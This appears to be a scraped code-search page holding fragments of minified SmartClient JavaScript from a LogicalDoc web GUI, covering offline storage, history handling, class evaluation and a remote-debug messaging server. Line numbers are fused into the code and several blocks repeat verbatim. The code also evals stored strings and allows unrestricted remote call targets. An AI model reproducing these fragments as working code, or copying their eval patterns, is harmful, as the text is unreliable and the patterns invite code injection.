2407return trimmed},getResponse:function(dsRequest){var trimmedRequest=this.trimRequest(dsRequest),key=this.serialize(trimmedRequest),value=this.get(key),returnValue;eval('returnValue = '+value);if(returnValue)returnValue.fromOfflineCache=true;return returnValue},serialize:function(obj){return isc.Comm.serialize(obj,false)},showStorageInfo:function(){if(!this.storageBrowser){if(isc.Offline.localStorageType()==isc.Offline.USERDATA_PERSISTENCE){isc.Timer.setTimeout(function(){isc.say("WARNING: This browser uses an old storage mechanism that does not permit arbitrary key/value pair storage. This means we have to store extra management data, with the upshot that the metrics reported for 'priority queue' and 'overhead' are indicative, but not accurate")},0)}2408this.metricsDF=isc.DynamicForm.create({width:"100%",numCols:6,fields:[{name:"storedEntries",title:"No. entries",disabled:true},{name:"storedKeyBytes",title:"Used by keys",disabled:true},{name:"storedValueBytes",title:"Used by values",disabled:true},{name:"priorityQueue",title:"Used by Priority Queue",disabled:true},{name:"metricsOverhead",title:"Metrics overhead",disabled:true},{name:"total",title:"Total Bytes",disabled:true}]});this.storageLG=isc.ListGrid.create({width:"100%",height:"*",canRemoveRecords:true,removeData:function(record){isc.ask("Remove this entry?",function(value){if(value){isc.Offline.remove(record.key);isc.Offline.refreshStorageInfo()}})},rowDoubleClick:function(record){isc.Offline.createStorageEditorWindow();isc.Offline.storageEditorWindow.show();isc.Offline.storageEditor.editRecord(record)},fields:[{name:"key",width:"25%",title:"Key"},{name:"value",title:"Value"}]});this.storageBrowser=isc.Window.create({autoCenter:true,canDragResize:true,width:Math.floor(isc.Page.getWidth()*0.5),height:Math.floor(isc.Page.getHeight()*0.5),title:"Offline Storage",items:[this.metricsDF,this.storageLG,isc.HLayout.create({width:"100%",height:1,members:[isc.LayoutSpacer.create({width:"*"}),isc.Button.create({title:"Add Entry",click:function(){isc.Offline.createStorageEditorWindow();isc.Offline.storageEditorWindow.show();isc.Offline.storageEditor.editNewRecord()}})]})]})}2409this.storageBrowser.show();this.refreshStorageInfo()},createStorageEditorWindow:function(){if(!isc.Offline.storageEditorWindow){isc.Offline.storageEditor=isc.DynamicForm.create({fields:[{name:"key",title:"Key",editorType:"TextAreaItem",width:400},{name:"value",title:"Value",editorType:"TextAreaItem",width:400},{name:"saveButton",type:"button",title:"Save",click:function(){var form=isc.Offline.storageEditor;if(form.saveOperationType=="update"&&form.getValue("key")!=form.getOldValue("key"))2410{isc.ask("Key has changed - this will create a new entry. Do you want to retain the old entry as well? (if you answer 'No', it will be removed",function(value){if(value===false){isc.Offline.remove(form.getOldValue("key"))}2411if(value!=null){isc.Offline.put(form.getValue("key"),form.getValue("value"));isc.Offline.storageEditorWindow.hide();isc.Offline.refreshStorageInfo()}})}else{isc.Offline.put(form.getValue("key"),form.getValue("value"));isc.Offline.storageEditorWindow.hide();isc.Offline.refreshStorageInfo()}}}]});isc.Offline.storageEditorWindow=isc.Window.create({bodyProperties:{margin:5},title:"Edit Offline Storage Entry",isModal:true,autoCenter:true,height:280,width:480,items:[isc.Offline.storageEditor]})}},refreshStorageInfo:function(){this.metricsDF.editRecord(isc.Offline.getStorageMetrics());var dataObj=isc.Offline.getCacheContents();var data=[];for(var key in dataObj){data.add({key:key,value:dataObj[key]})}2412this.storageLG.setData(data)}};var UserDataPersistence={isInitialized:false,poolSize:10,keyIndexKey:"keyIndex",reverseKeyIndexKey:"reverseKeyIndex",init:function(){this.userDataSpan=[];for(var i=0;i<this.poolSize;i++){this.userDataSpan[i]=document.createElement('span');this.userDataSpan[i].ID='isc_userData_'+i;this.userDataSpan[i].style.behavior='url(#default#userdata)';document.body.appendChild(this.userDataSpan[i]);this.userDataSpan[i].load("isc_userData_"+i)}

File name: logicaldoc/logicaldoc-gui/war/login/sc/modules/ISC_History.jsCode:

52return _1}})}53isc.Browser.$1689=(!!document.createElementNS&&"contains"in document.createElementNS("http://www.w3.org/2000/svg","svg"));if(!isc.Browser.$1689&&window.SVGElement!=null){SVGElement.prototype.contains=function(_1){for(;_1!=null;_1=_1.parentNode){if(this===_1)return true}54return false}}55isc.Browser.$1560=("placeholder"in document.createElement("input")&&"placeholder"in document.createElement("textarea"));isc.Browser.$158n=isc.Browser.isMobileWebkit&&"webkitMaskBoxImage"in document.documentElement.style;isc.Browser.$162m=(window.screen!=null&&"orientation"in screen&&"type"in screen.orientation);isc.Browser.$165v=(!isc.Browser.isSafari&&!isc.Browser.isChrome&&!!document.createElementNS&&"getIntersectionList"in document.createElementNS("http://www.w3.org/2000/svg","svg")&&"createSVGRect"in document.createElementNS("http://www.w3.org/2000/svg","svg"));isc.Browser.$1691=(window.JSON!=null&&typeof window.JSON.parse==="function"&&typeof window.JSON.stringify==="function"&&window.JSON.stringify("\u0013")==="\"\\u0013\"");isc.Browser.canUseAggressiveGridTimings=!isc.Browser.isAndroid;isc.Browser.useHighPerformanceGridTimings=window.isc_useHighPerformanceGridTimings==null?


isc.Browser.canUseAggressiveGridTimings:window.isc_useHighPerformanceGridTimings&&isc.Browser.canUseAggressiveGridTimings;if(isc.addProperties==null){isc.addGlobal("addProperties",function(_1,_2){for(var _3 in _2)56_1[_3]=_2[_3];return _1})}57isc.addGlobal("evalSA",function(_1){if(isc.eval)isc.eval(_1);else eval(_1)});isc.addGlobal("defineStandaloneClass",function(_1,_2){if(isc[_1]){if(_1=="FileLoader"&&isc.FileLoader.$139n){isc[_1]=null}else{return}}58isc.addGlobal(_1,_2);isc.addProperties(_2,{$i:_1,fireSimpleCallback:function(_6){_6.method.apply(_6.target?_6.target:window,_6.args?_6.args:[])},logMessage:function(_6,_7,_8){if(isc.Log){isc.Log.logMessage(_6,_7,_8);return}59if(!isc.$j)isc.$j=[];isc.$j[isc.$j.length]={priority:_6,message:_7,category:_8,timestamp:new Date()}},logError:function(_6){this.logMessage(2,_6,this.$i)},logWarn:function(_6){this.logMessage(3,_6,this.$i)},logInfo:function(_6){this.logMessage(4,_6,this.$i)},logDebug:function(_6){this.logMessage(5,_6,this.$i)},$102q:function(_6,_7){if(!_6){throw(_7||"assertion failed")}},isAString:function(_6){if(isc.isA)return isc.isA.String(_6);return typeof _6=="string"},isAnArray:function(_6){if(isc.isA)return isc.isAn.Array(_6);return typeof _6=="array"},$ez:new RegExp("'","g"),$e0:new RegExp("\"","g"),$138c:function(_6,_7){if(!this.isAString(_6))_6=String(_6);var _3=_7?this.$ez:this.$e0,_4=_7?"'":'"';return _4+_6.replace(/\\/g,"\\\\").replace(_3,'\\'+_4).replace(/\t/g,"\\t").replace(/\r/g,"\\r").replace(/\n/g,"\\n").replace(/\u2028/g,"\\u2028").replace(/\u2029/g,"\\u2029")+_4},$138j:function(_6,_7){if(!this.isAString(_6))_6=String(_6);var s=_6.replace(/&/g,"&").replace(/</g,"<").replace(/>/g,">").replace(/(\r\n|\r|\n) /g,"<BR> ").replace(/(\r\n|\r|\n)/g,"<BR>").replace(/\t/g," ");return(_7?s.replace(/ /g," "):s.replace(/ /g," "))}});_2.isAn=_2.isA;return _2});isc.defineStandaloneClass("SA_Page",{$l:(isc.Page&&isc.Page.isLoaded())||false,$m:[],isLoaded:function(){return this.$l},onLoad:function(_1,_2,_3){this.$m.push({method:_1,target:_2,args:_3});if(!this.$n){this.$n=true;if((isc.Browser.isIE&&isc.Browser.version<11)||isc.Browser.isOpera){window.attachEvent("onload",function(){isc.SA_Page.$o()})}else{window.addEventListener("load",function(){isc.SA_Page.$o()},true)}}},$o:function(){if(!window.isc||this.$l)return;this.$l=true;for(var i=0;i<this.$m.length;i++){var _2=this.$m[i];this.fireSimpleCallback(_2)}60delete this.$m}});if(!isc.SA_Page.isLoaded()){isc.SA_Page.onLoad(function(){this.$l=true},isc.SA_Page)}61isc.defineStandaloneClass("History",{$138g:[],$138h:1,registerCallback:function(_1,_2,_3){if(_1==null){if(!_3)this.unregisterCallback(0);return-1}62var _4;if(_3){_4=this.$138h++}else{this.unregisterCallback(0);_4=0}

File name: logicaldoc/logicaldoc-gui/war/login/sc/system/development/ISC_Core.jsCode:

1982if(_2)isc.Class.fireCallback(_2,"categories",[_3]);return _3},isc.A.getLogCategoryData=function isc_DebugTarget_getLogCategoryData(_1,_2){var _3=(_1?isc.Log.getLogPriorities(_1,true):null),_4=this.getLogCategories(_1),_5=isc.Log;var _6=[],_7;for(var i=0;i<_4.length;i++){var _9=_4[i];if(_1){if(_9==isc.Log._allCategories)continue;else if(_9==isc.Log.$fs){_7=window[_1].getDefaultLogPriority();continue}}1983var _10=_5.getPriority(_9,_1);var _11=this.DEFAULT_CATEGORIES.findIndex("name",_9);var _12;if(_11!=-1)_12=this.DEFAULT_CATEGORIES[_11].description;_6.add({category:_9,description:_12,priority:_10||_5.defaultPriority,custom:_3&&_3[_9]!=null})}1984_6.add({category:"[default]",priority:(_7||_5.defaultPriority),custom:(_7?true:false)});this.fireCallback(_2,"categoryData",[_6])},isc.A.generateLogMenuItems=function isc_DebugTarget_generateLogMenuItems(_1,_2,_3){var _4=this.getLogCategories(),_5=[],_6=[];var _7=Math.min(_4.length,_2);for(var i=0;i<_7;i++){var _9=_4[i];var _10=isc.Log.getPriority(_9,_1);if(_10==null)_10=isc.Log.getDefaultPriority();_6.add({title:_9,selectedLevel:_10,category:_9,addPrioritiesSubmenu:true,enableIf:"menu.allCategoriesOverride() == null"})}1985_6.add({isSeparator:true});_6.add({title:"[default]",category:"$fs",addPrioritiesSubmenu:true,selectedLevel:isc.Log.getDefaultPriority(_1),enableIf:"menu.allCategoriesOverride() == null"})1986_6.add({title:"More...",click:"menu.setCustomLogPriorities()"});_5=_6.duplicate();_6=_1!=null?_5:_6;for(var i=0;i<_6.length;i++){var _11=_6[i],_9=_11.category;if(_9){var _12=isc.Log.getPriority(_9,_1),_13=(_12>isc.Log.WARN?"color:blue;":null);if(_13!=_11.cssText){_11.cssText=_13}}}1987this.fireCallback(_3,"menuItems",[_6])},isc.A.getGlobalLogCookie=function isc_DebugTarget_getGlobalLogCookie(_1){var _2=isc.LogViewer.getGlobalLogCookie();if(_2==null)_2={};_2.priorityDefaults=isc.Log.getLogPriorities();_2.defaultPriority=isc.Log.defaultPriority;if(_1)this.fireCallback(_1,"globalLogCookie",


[_2]);return _2},isc.A.set=function isc_DebugTarget_set(_1,_2,_3){var _1=isc.Class.globalEvalWithCapture(_1+"="+_2);if(_3)this.fireCallback(_3,"lValue",[eval(_1)])},isc.A.get=function isc_DebugTarget_get(_1,_2){this.fireCallback(_2,"value",[eval(_1)])});isc.B._maxIndex=isc.C+30;isc.defineClass("DebugFocus").addClassProperties({hideTimeout:2000,opacityMax:75,opacityMin:50,oscillationFrequency:2000,showFocus:function(){if(this.$ke&&this.$ke.isVisible()){this.clearHideTimer();this.setHideTimer();return}1988if(!this.$ke){this.$ke=isc.Canvas.create({width:"100%",height:"100%",overflow:"hidden",backgroundColor:"#4169E1",hideUsingDisplayNone:true})}1989var _1=this.$ke;_1.setOpacity(this.opacityMin);_1.show();_1.bringToFront();this.setHideTimer();this.startFadeInAnimation()},clearFocus:function(){this.clearHideTimer();this.hideFocus()},startFadeOutAnimation:function(){this.$ke.cancelAnimation(this.fadeAnimationID);this.fadeAnimationID=this.$ke.animateFade(this.opacityMin,"isc.DebugFocus.startFadeInAnimation()",this.oscillationFrequency/2,"smoothStart")},startFadeInAnimation:function(){this.$ke.cancelAnimation(this.fadeAnimationID);this.fadeAnimationID=this.$ke.animateFade(this.opacityMax,"isc.DebugFocus.startFadeOutAnimation()",this.oscillationFrequency/2,"smoothStart")},hideFocus:function(){if(this.$ke!=null){this.$ke.cancelAnimation(this.fadeAnimationID);this.$ke.hide()}},clearHideTimer:function(){if(this.$144p!=null){isc.Timer.clearTimeout(this.$144p);delete this.$144p}},setHideTimer:function(){this.$144p=isc.Timer.setTimeout("isc.DebugFocus.hideFocus()",this.hideTimeout)}});isc.defineClass("RemoteDebug").addClassProperties({isEnabled:false,modulesDir:"system/development/",getUniqueChannelName:function(){return navigator.userAgent},conditionallyEnable:function(){this.logDebug("conditionally enabling debug");if(window.isc_remoteDebug&&isc.Browser.isMobile){this.enable()}else if(isc.params["isc_remoteDebug"]=="true"){this.enable()}},requiredModules:["RealtimeMessaging"],loadRequiredModules:function(_1){var _2=this;isc.FileLoader.ensureLoaded(function(){var _3=isc.FileLoader.modulesDir;isc.FileLoader.modulesDir=_2.modulesDir1990isc.FileLoader.loadModules(_2.requiredModules,function(){isc.FileLoader.modulesDir=_3;_2.fireCallback(_1)});isc.FileLoader.modulesDir=_3})},enable:function(_1){if(this.isEnabled){_2.fireCallback(_1)}1991if(!isc.hasOptionalModules("SCServer")){alert("Remote debugging requires a Pro or better license.");return}1992if(!isc.Log.logViewer)isc.Log.logViewer=isc.LogViewer.create();var _2=this;this.loadRequiredModules(function(){isc.debugTarget=isc.DebugTarget.create({});isc.debugTarget.start(function(){isc.debugTarget.sendTargetAvailableNotify();_2.isEnabled=true;_2.logInfo("Remote debug enabled");_2.fireCallback(_1)})})},enableLocal:function(_1){if(isc.debugTarget){isc.debugTarget.debugDisable()}


1982if(_2)isc.Class.fireCallback(_2,"categories",[_3]);return _3},isc.A.getLogCategoryData=function isc_DebugTarget_getLogCategoryData(_1,_2){var _3=(_1?isc.Log.getLogPriorities(_1,true):null),_4=this.getLogCategories(_1),_5=isc.Log;var _6=[],_7;for(var i=0;i<_4.length;i++){var _9=_4[i];if(_1){if(_9==isc.Log._allCategories)continue;else if(_9==isc.Log.$fs){_7=window[_1].getDefaultLogPriority();continue}}1983var _10=_5.getPriority(_9,_1);var _11=this.DEFAULT_CATEGORIES.findIndex("name",_9);var _12;if(_11!=-1)_12=this.DEFAULT_CATEGORIES[_11].description;_6.add({category:_9,description:_12,priority:_10||_5.defaultPriority,custom:_3&&_3[_9]!=null})}1984_6.add({category:"[default]",priority:(_7||_5.defaultPriority),custom:(_7?true:false)});this.fireCallback(_2,"categoryData",[_6])},isc.A.generateLogMenuItems=function isc_DebugTarget_generateLogMenuItems(_1,_2,_3){var _4=this.getLogCategories(),_5=[],_6=[];var _7=Math.min(_4.length,_2);for(var i=0;i<_7;i++){var _9=_4[i];var _10=isc.Log.getPriority(_9,_1);if(_10==null)_10=isc.Log.getDefaultPriority();_6.add({title:_9,selectedLevel:_10,category:_9,addPrioritiesSubmenu:true,enableIf:"menu.allCategoriesOverride() == null"})}1985_6.add({isSeparator:true});_6.add({title:"[default]",category:"$fs",addPrioritiesSubmenu:true,selectedLevel:isc.Log.getDefaultPriority(_1),enableIf:"menu.allCategoriesOverride() == null"})1986_6.add({title:"More...",click:"menu.setCustomLogPriorities()"});_5=_6.duplicate();_6=_1!=null?_5:_6;for(var i=0;i<_6.length;i++){var _11=_6[i],_9=_11.category;if(_9){var _12=isc.Log.getPriority(_9,_1),_13=(_12>isc.Log.WARN?"color:blue;":null);if(_13!=_11.cssText){_11.cssText=_13}}}1987this.fireCallback(_3,"menuItems",[_6])},isc.A.getGlobalLogCookie=function isc_DebugTarget_getGlobalLogCookie(_1){var _2=isc.LogViewer.getGlobalLogCookie();if(_2==null)_2={};_2.priorityDefaults=isc.Log.getLogPriorities();_2.defaultPriority=isc.Log.defaultPriority;if(_1)this.fireCallback(_1,"globalLogCookie",


[_2]);return _2},isc.A.set=function isc_DebugTarget_set(_1,_2,_3){var _1=isc.Class.globalEvalWithCapture(_1+"="+_2);if(_3)this.fireCallback(_3,"lValue",[eval(_1)])},isc.A.get=function isc_DebugTarget_get(_1,_2){this.fireCallback(_2,"value",[eval(_1)])});isc.B._maxIndex=isc.C+30;isc.defineClass("DebugFocus").addClassProperties({hideTimeout:2000,opacityMax:75,opacityMin:50,oscillationFrequency:2000,showFocus:function(){if(this.$ke&&this.$ke.isVisible()){this.clearHideTimer();this.setHideTimer();return}1988if(!this.$ke){this.$ke=isc.Canvas.create({width:"100%",height:"100%",overflow:"hidden",backgroundColor:"#4169E1",hideUsingDisplayNone:true})}1989var _1=this.$ke;_1.setOpacity(this.opacityMin);_1.show();_1.bringToFront();this.setHideTimer();this.startFadeInAnimation()},clearFocus:function(){this.clearHideTimer();this.hideFocus()},startFadeOutAnimation:function(){this.$ke.cancelAnimation(this.fadeAnimationID);this.fadeAnimationID=this.$ke.animateFade(this.opacityMin,"isc.DebugFocus.startFadeInAnimation()",this.oscillationFrequency/2,"smoothStart")},startFadeInAnimation:function(){this.$ke.cancelAnimation(this.fadeAnimationID);this.fadeAnimationID=this.$ke.animateFade(this.opacityMax,"isc.DebugFocus.startFadeOutAnimation()",this.oscillationFrequency/2,"smoothStart")},hideFocus:function(){if(this.$ke!=null){this.$ke.cancelAnimation(this.fadeAnimationID);this.$ke.hide()}},clearHideTimer:function(){if(this.$144p!=null){isc.Timer.clearTimeout(this.$144p);delete this.$144p}},setHideTimer:function(){this.$144p=isc.Timer.setTimeout("isc.DebugFocus.hideFocus()",this.hideTimeout)}});isc.defineClass("RemoteDebug").addClassProperties({isEnabled:false,modulesDir:"system/development/",getUniqueChannelName:function(){return navigator.userAgent},conditionallyEnable:function(){this.logDebug("conditionally enabling debug");if(window.isc_remoteDebug&&isc.Browser.isMobile){this.enable()}else if(isc.params["isc_remoteDebug"]=="true"){this.enable()}},requiredModules:["RealtimeMessaging"],loadRequiredModules:function(_1){var _2=this;isc.FileLoader.ensureLoaded(function(){var _3=isc.FileLoader.modulesDir;isc.FileLoader.modulesDir=_2.modulesDir1990isc.FileLoader.loadModules(_2.requiredModules,function(){isc.FileLoader.modulesDir=_3;_2.fireCallback(_1)});isc.FileLoader.modulesDir=_3})},enable:function(_1){if(this.isEnabled){_2.fireCallback(_1)}1991if(!isc.hasOptionalModules("SCServer")){alert("Remote debugging requires a Pro or better license.");return}1992if(!isc.Log.logViewer)isc.Log.logViewer=isc.LogViewer.create();var _2=this;this.loadRequiredModules(function(){isc.debugTarget=isc.DebugTarget.create({});isc.debugTarget.start(function(){isc.debugTarget.sendTargetAvailableNotify();_2.isEnabled=true;_2.logInfo("Remote debug enabled");_2.fireCallback(_1)})})},enableLocal:function(_1){if(isc.debugTarget){isc.debugTarget.debugDisable()}


256var _5=isc.shallowClone(_2);var _6=this.$769;if(_6.$77a!=null&&_6.$77a[_1]!=null&&_5!=null)257{for(var i=0;i<_6.$77a[_1].length;i++){var _7=_6.$77a[_1][i];if(_5[_7]!=null){_5[_7]=isc.shallowClone(_5[_7])}}}258return _5},isc.A.evaluate=function isc_c_Class_evaluate(_1,_2,_3,_4,_5,_6){if(_5){return this.parseStrictJSON(_1,_6)}259if(!isc.$611)isc.$611=0;isc.$611++;var _7;if(_4&&isc.Browser.isIE&&!_3&&isc.Page.isLoaded()){_7=this.evalInIFrame(_1,_2)}else{if(_2){with(_2){if(_3)_7=window.eval(_1)260else _7=eval(_1)}}else{if(_3)_7=window.eval(_1)261else _7=eval(_1)}}262if(isc.$611!=null)isc.$611--;if(isc.$611==0)delete isc.$611;return _7},isc.A.parseStrictJSON=function isc_c_Class_parseStrictJSON(_1,_2,_3,_4){var _5;if(_3||_4||!isc.Browser.$1691){_5=this.getJSONParseFunc()}else{_5=window.JSON.parse}263return _5(_1,_2,_4)},isc.A.getJSONParseFunc=function isc_c_Class_getJSONParseFunc(){if(this.$105i)return this.$105i;this.logInfo("No native JSON.parse() available in this browser. Creating strict JSON parsing function.","jsonEval");var _1=this,_2=this.$105h;this.$105y=function(_13,_14,_15,_16,_10){var _3;var k,v,_6=_13[_14];if(_6&&typeof _6==='object'&&_6!=window&&_6!=window.isc&&!isc.isA.Class(_6)&&!isc.isAn.Instance(_6))264{var _7=false;var _8=isc.JSONEncoder.$zl(_16,_6);if(_8!=null&&_10.contains(_8)){var _9=_10.substring(_8.length,_8.length+1);if(_9=="."||_9=="["||_9=="]"){_7=true}}265if(!_7){isc.JSONEncoder.$zm(_16,_6,_10);for(k in _6){if(Object.prototype.hasOwnProperty.call(_6,k)){var _10=isc.JSONEncoder.$zp(_10,k);v=_1.$105y(_6,k,_15,_16,_10);if(v!==_3){_6[k]=v}else{delete _6[k]}}}}}


266return _15.call(_13,_14,_6)};this.$105i=function(_13,_14,_15){var j;var _12=false;if(_15==null)_15=isc.Class.$105j;if(!_15){_13=String(_13);_2.lastIndex=0;if(_2.test(_13)){_13=_13.replace(_2,function(_16){return'\\u'+('0000'+_16.charCodeAt(0).toString(16)).slice(-4)})}


255if(isc.Canvas&&isc.isA.Canvas(_2)){this.logWarn("Default value for property '"+_1+"' is set to a live Canvas (with ID '"+_2.getID()+"') at the Class or AutoChild-defaults level. SmartClient cannot clone a live widget, so each instance of this class may end up pointing to the same live component. To avoid unpredictable behavior and suppress this warning, use the AutoChild subsystem to set up re-usable default properties for sub-components.");return _2}256var _5=isc.shallowClone(_2);var _6=this.$769;if(_6.$77a!=null&&_6.$77a[_1]!=null&&_5!=null)257{for(var i=0;i<_6.$77a[_1].length;i++){var _7=_6.$77a[_1][i];if(_5[_7]!=null){_5[_7]=isc.shallowClone(_5[_7])}}}258return _5},isc.A.evaluate=function isc_c_Class_evaluate(_1,_2,_3,_4,_5,_6){if(_5){return this.parseStrictJSON(_1,_6)}259if(!isc.$611)isc.$611=0;isc.$611++;var _7;if(_4&&isc.Browser.isIE&&!_3&&isc.Page.isLoaded()){_7=this.evalInIFrame(_1,_2)}else{if(_2){with(_2){if(_3)_7=window.eval(_1)260else _7=eval(_1)}}else{if(_3)_7=window.eval(_1)261else _7=eval(_1)}}262if(isc.$611!=null)isc.$611--;if(isc.$611==0)delete isc.$611;return _7},isc.A.parseStrictJSON=function isc_c_Class_parseStrictJSON(_1,_2,_3,_4){var _5;if(_3||_4||!isc.Browser.$1691){_5=this.getJSONParseFunc()}else{_5=window.JSON.parse}263return _5(_1,_2,_4)},isc.A.getJSONParseFunc=function isc_c_Class_getJSONParseFunc(){if(this.$105i)return this.$105i;this.logInfo("No native JSON.parse() available in this browser. Creating strict JSON parsing function.","jsonEval");var _1=this,_2=this.$105h;this.$105y=function(_13,_14,_15,_16,_10){var _3;var k,v,_6=_13[_14];if(_6&&typeof _6==='object'&&_6!=window&&_6!=window.isc&&!isc.isA.Class(_6)&&!isc.isAn.Instance(_6))264{var _7=false;var _8=isc.JSONEncoder.$zl(_16,_6);if(_8!=null&&_10.contains(_8)){var _9=_10.substring(_8.length,_8.length+1);if(_9=="."||_9=="["||_9=="]"){_7=true}}265if(!_7){isc.JSONEncoder.$zm(_16,_6,_10);for(k in _6){if(Object.prototype.hasOwnProperty.call(_6,k)){var _10=isc.JSONEncoder.$zp(_10,k);v=_1.$105y(_6,k,_15,_16,_10);if(v!==_3){_6[k]=v}else{delete _6[k]}}}}}


235return _14},isc.A.createRaw=function isc_c_Class_createRaw(){if(this.$1226&&!isc.isVisualBuilderSDK){var _1="Attempt to create "+this.getClassName()+". This class requires the Dashboards & Tools framework which is only included with Enterprise licenses.";isc.logWarn(_1);if(!this.$1228){try{isc.warn(_1);this.$1228=true}catch(e){}}236return null}237if(!this.initialized())this.init();var _2=new this.$b4.$b5();_2.ns=this.ns;return _2},isc.A.init=function isc_c_Class_init(){var _1=this.getSuperClass();if(_1!=null&&!_1.initialized())_1.init();var _2=this.$cg;if(_2!=null){this.$cg=null;var _3=isc.captureDefaults;if(_3)isc.captureDefaults=false;_2.map(function(_4){isc.eval(_4)});if(_3)isc.captureDefaults=true}238if(this.autoDupMethods){isc.Class.duplicateMethods(this,this.autoDupMethods)}239this.$cj[this.Class]=true},isc.A.modifyFrameworkStart=function isc_c_Class_modifyFrameworkStart(){isc.definingFramework=true},isc.A.modifyFrameworkDone=function isc_c_Class_modifyFrameworkDone(){isc.definingFramework=false},isc.A.duplicateMethods=function isc_c_Class_duplicateMethods(_1,_2){if(_1.Class&&this.dontDup[_1.Class])return;for(var i=0;i<_2.length;i++){var _4=_2[i];this.duplicateMethod(_4,_1)}},isc.A.duplicateMethod=function(methodName,target){if(!target)target=this;var method=target[methodName];if(method==null)return;if(method.$761){while(method.$761)method=method.$761}240var dup;if(method.toSource==null){dup=eval("dup = "+method.toString())}else{dup=eval(method.toSource())}241if(!method.$dx)isc.Func.getName(method,true);dup.$dx=method.$dx+"[d]";dup.$761=method;target[methodName]=dup;return dup},isc.A.


$1361=function isc_c_Class__createUnsupportedMethodImpl(_1,_2){var _3={};var _4=function(){var _5=this.getClassName();if(_3[_5])return;var _6=_1.replace(/(\$?)\$(class|method)/g,function(_8,_9,_10,_11,_1){if(_9==="$")return"$"+_10;else if(_10==="class")return _5;else if(_10==="method")return _2});this.logWarn(_6);_3[_5]=true};_4.$1362=true;var _7=this.$b4[_2];if(isc.isA.Function(_7)){_4.$123y=isc.Func.getArgString(_7)}242return _4},isc.A.markUnsupportedMethods=function isc_c_Class_markUnsupportedMethods(_1,_2){if(_1==null)_1="$class does not support the $method() method.";for(var i=0;i<_2.length;++i){var _4=_2[i];this.$b4[_4]=this.$1361(_1,_4)}},isc.A.isMethodSupported=function isc_c_Class_isMethodSupported(_1){var _2=this.$b4[_1];return _2!=null&&!_2.$1362},isc.A.isMethodUnsupported=function isc_c_Class_isMethodUnsupported(_1){return!this.isMethodSupported(_1)},isc.A.initialized=function isc_c_Class_initialized(){return this.$cj[this.Class]},isc.A.getClassName=function isc_c_Class_getClassName(){return this.Class},isc.A.getScClassName=function isc_c_Class_getScClassName(){return this.isFrameworkClass?this.Class:this.$75y},isc.A.compareScClassName=function isc_c_Class_compareScClassName(_1,_2){return _1.getScClassName()==_2},isc.A.getSuperClass=function isc_c_Class_getSuperClass(){return this.$b8},isc.A.getPrototype=function isc_c_Class_getPrototype(){return this.$b4},isc.A.addMethods=function isc_c_Class_addMethods(){if(this.$a5){this.logWarn("Use addInterfaceMethods() to add methods to interface "+this)}243for(var i=0;i<arguments.length;i++)244isc.addMethods(this.$b4,arguments[i]);return this.$b4},isc.A.addInterfaceMethods=function isc_c_Class_addInterfaceMethods(){for(var i=0;i<arguments.length;i++)245isc.addMethods(this.$b4,arguments[i])},isc.A.addInterfaceProperties=function isc_c_Class_addInterfaceProperties(){isc.addPropertyList(this.$b4,arguments,true)},isc.A.registerStringMethods=function isc_c_Class_registerStringMethods(_1,_2){var _3=this._stringMethodRegistry;if(!this.isOverridden("_stringMethodRegistry")){var _4={},_5=_4.$cq=(_3.$cq?_3.$cq.duplicate():[]);for(var i=0;i<_5.length;i++){_4[_5[i]]=_3[_5[i]]}


1943this.sockets=[];this.socket=isc.ClassFactory.getClass(this.socketConstructor,true).create({receiveChannel:this.receiveChannel,packetReceived:function(_6,_7,_8){_2.handlePacket(_6,_7,_8)}},this.socketDefaults,this.socketProperties);this.sockets.add(this.socket);if(this.discoverableOnChannel){this.discoverySocket=isc.ClassFactory.getClass(this.socketConstructor,true).create({receiveChannel:this.discoverableOnChannel,packetReceived:function(_6,_7,_8){_2.handlePacket(_6,_7,_8)}},this.socketDefaults,this.socketProperties);this.sockets.add(this.discoverySocket)}1944var _2=this;var _3=0;for(var i=0;i<this.sockets.length;i++){var _5=this.sockets[i];_5.bind(function(){if(++_3==_2.sockets.length){_2.isAvailable=true;if(_1)_2.fireCallback(_1)}})}},stop:function(_1){this.isAvailable=false;if(!this.sockets){this.fireCallback(_1);return}1945var _2=this;var _3=this.sockets.length;for(var i=0;this.sockets&&i<this.sockets.length;i++){var _5=this.sockets[i];_5.close(function(){if(--_3==0){delete _2.sockets;if(_1)_2.fireCallback(_1)}})}},discover:function(_1){this.logDebug("discover invoked - callback: "+(_1?_1.toString():"null"));if(_1)this.fireCallback(_1,"serverProperties",[this.getServerProperties()])},ping:function(_1){this.logDebug("ping");if(_1)this.fireCallback(_1)},connect:function(_1){this.logDebug("connect");if(_1)this.fireCallback(_1)},disconnect:function(_1){this.logDebug("disconnect");if(_1)this.fireCallback(_1)},call:function(_1,_2,_3){var _4=this;var _5;var _6={};if(isc.isAn.Object(_1)){_6=_1;_5=_6.targetName;_1=_6.methodName;_2=_6.args;_3=_6.callback}1946if(!_5){var _7=_1.lastIndexOf(".");if(_7!=-1){_5=_1.substring(0,_7);_1=_1.substring(_7+1)}}1947if(_5&&!this.allowUnrestrictedCallTarget){this.logError("Attempt to call: "+_5+"."+_1+"() REJECTED - to enable, set allowUnrestrictedCallTarget on your "+this.getClassName());return}1948var _8=_5?eval(_5):this;if(!(this.visibleMethods.contains("*")||this.allowUnrestrictedCallTarget)){if(!(this.visibleMethods.contains(_1)||isc.MessagingDMI.builtinMethods.contains(_1))){this.logError("Attempt to call non-visible method: "+_1+" DENIED. To allow this action, declare this method in your "+this.getClassName()+".visibleMethods list.");return}}1949var _9=_8[_1];if(!_9){this.logError("Unable to find method named '"+_1+"' on class: "+this.getClassName());return}1950if(!_2)_2=[];if(!isc.isAn.Array(_2))


{this.logError("Expected Array as second arg or props.args in "+this.getClassName()+".call(), but got:"+isc.echoFull(_2));return}1951if(_8==this){_9.apply(this,_2.concat([function(_10){if(_3)_4.fireCallback(_3,"retVal",[_10])}]))}else{var _10=_9.apply(_8,_2);if(_3)_4.fireCallback(_3,"retVal",[_10])}}});isc.defineClass("DebugTarget","MessagingDMIServer");isc.A=isc.DebugTarget.getPrototype();isc.B=isc._allFuncs;isc.C=isc.B._maxIndex;isc.D=isc._funcClasses;isc.D[isc.C]=isc.A.Class;isc.A.allowUnrestrictedCallTarget=true;isc.A.discoverableOnChannel="isc_DebugTarget";isc.A.socketDefaults={doNotTrackRPC:true,isRemoteDebug:true};isc.A.discoverySocketDefaults={doNotTrackRPC:true,isRemoteDebug:true};isc.A.$f8="count";isc.A.DEFAULT_CATEGORIES=[{name:"layout",description:"Logs from Layout and Stack about members and layout policy."},{name:"sizing",description:"Reporting drawn sizes"},{name:"scrolling",description:"Detecting the need for scrolling and custom scrollbars"},{name:"animation",description:"Animation logs"},{name:"RPCManager",description:"RPC and DataSource requests and responses"},{name:"RPCManagerResponse",description:"Enable logging of full length 